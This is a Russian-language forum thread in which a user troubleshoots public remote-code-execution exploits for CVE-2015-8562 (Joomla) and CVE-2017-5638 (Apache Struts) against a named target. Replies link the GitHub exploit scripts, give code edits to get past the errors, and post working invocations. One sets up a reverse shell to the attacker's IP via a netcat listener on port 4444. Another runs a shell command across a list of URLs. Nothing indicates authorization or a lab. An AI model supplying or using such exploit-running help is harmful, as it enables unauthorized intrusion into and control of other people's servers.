CVE-2015-8562

  • Автор темы Автор темы kamaz
  • Дата начала Дата начала
  • Теги Теги
    cve-2017-5638
K

kamaz

привет!
пробую эксплойт с све из заголовка,получаю такую ошибку

[+] Attacking: mytarget.com
Traceback (most recent call last):
File "rce.py", line 155, in <module>
main()
File "rce.py", line 151, in main
x.exploit_target(target, ip, port)
File "rce.py", line 111, in exploit_target
print("[+] Target IP: " + socket.gethostbyname(url.split('/')[2]))
IndexError: list index out of range

пробую второй с све-CVE-2017-5638
# python CVE-2017-5638.py
Traceback (most recent call last):
File "CVE-2017-5638.py", line 11, in <module>
strutz = open(sys.argv[1], "r").readlines()
IndexError: list index out of range

мог бы кто-то указать на мои ошибки

спасибо
 
привет!
пробую эксплойт с све из заголовка,получаю такую ошибку

[+] Attacking: mytarget.com
Traceback (most recent call last):
File "rce.py", line 155, in <module>
main()
File "rce.py", line 151, in main
x.exploit_target(target, ip, port)
File "rce.py", line 111, in exploit_target
print("[+] Target IP: " + socket.gethostbyname(url.split('/')[2]))
IndexError: list index out of range

пробую второй с све-CVE-2017-5638
# python CVE-2017-5638.py
Traceback (most recent call last):
File "CVE-2017-5638.py", line 11, in <module>
strutz = open(sys.argv[1], "r").readlines()
IndexError: list index out of range

мог бы кто-то указать на мои ошибки

спасибо
Напиши, а как ты их запускаешь ? python с последующими аргументами, если да, то кинь ссылку на эксплоиты
 
  • Нравится
Реакции: kamaz
первый запускаю так

неткатом открываю порт 4444

после в терминале

python rce.py --target=mytarget.com --ip=myip --port=4444
 
ссылки
hыы://github.com/r0otshell/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638
ыы://github.com/anarcoder/CVE-2015-8562

в python rce.py-h это все взял там знаки стоят
второй даже хелп не отображает

тему можно закрывать ,DefWolf дал исчерпывающую информацию!за что ему большое человеческое спасибо!
 
https://github.com/r0otshell/Apache...v2-CVE-2017-5638/blob/master/CVE-2017-5638.py
В этом сплойте тебя просили указать имя файла,где содержаться урл,можешь заменить 11 строку,если тебе нужен только один сайт и ты не хочешь париться на эту
Python:
strutz = [raw_input('')]

Что касается этого... https://github.com/anarcoder/CVE-2015-8562/blob/master/rce.py
Я могу лишь преположить,что разработчик допустил ошибку...хотяя...
Крч убирай в 110 строчке
Код:
.split('/')[2]

(Это я для будущего поколения расписал)
 
  • Нравится
Реакции: kamaz
https://github.com/r0otshell/Apache...v2-CVE-2017-5638/blob/master/CVE-2017-5638.py
В этом сплойте тебя просили указать имя файла,где содержаться урл,можешь заменить 11 строку,если тебе нужен только один сайт и ты не хочешь париться на эту
Python:
strutz = [raw_input('')]

Что касается этого... https://github.com/anarcoder/CVE-2015-8562/blob/master/rce.py
Я могу лишь преположить,что разработчик допустил ошибку...хотяя...
Крч убирай в 110 строчке
Код:
.split('/')[2]

(Это я для будущего поколения расписал)
граматно,спасибо что не прошли мимо!
Подскажите где найти рабочие RCE эксплойты,где мониторить новые,может фраймворк существует какой-тов общем жилание знать все на эту тему.
спасибо

https://github.com/r0otshell/Apache...v2-CVE-2017-5638/blob/master/CVE-2017-5638.py
В этом сплойте тебя просили указать имя файла,где содержаться урл,можешь заменить 11 строку,если тебе нужен только один сайт и ты не хочешь париться на эту
Python:
strutz = [raw_input('')]

Что касается этого... https://github.com/anarcoder/CVE-2015-8562/blob/master/rce.py
Я могу лишь преположить,что разработчик допустил ошибку...хотяя...
Крч убирай в 110 строчке
Код:
.split('/')[2]

(Это я для будущего поколения расписал)

теперь такая ошибка
File "rce.py", line 113
headers = {'User-Agent': user_agent,
^
SyntaxError: invalid syntax
 
Ахтунг! Код работает без правок!

Код:
python3 rce.py --target='http://someshit.com' --ip='yourip' --port=4444

Второй тоже без проблем:

Код:
python CVE-2017-5638.py urls.txt ls
 

Вложения

  • Screenshot at 2018-01-14 17-51-44.png
    Screenshot at 2018-01-14 17-51-44.png
    7,4 КБ · Просмотры: 613
  • Screenshot at 2018-01-14 17-56-22.png
    Screenshot at 2018-01-14 17-56-22.png
    9,3 КБ · Просмотры: 576
Последнее редактирование:
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab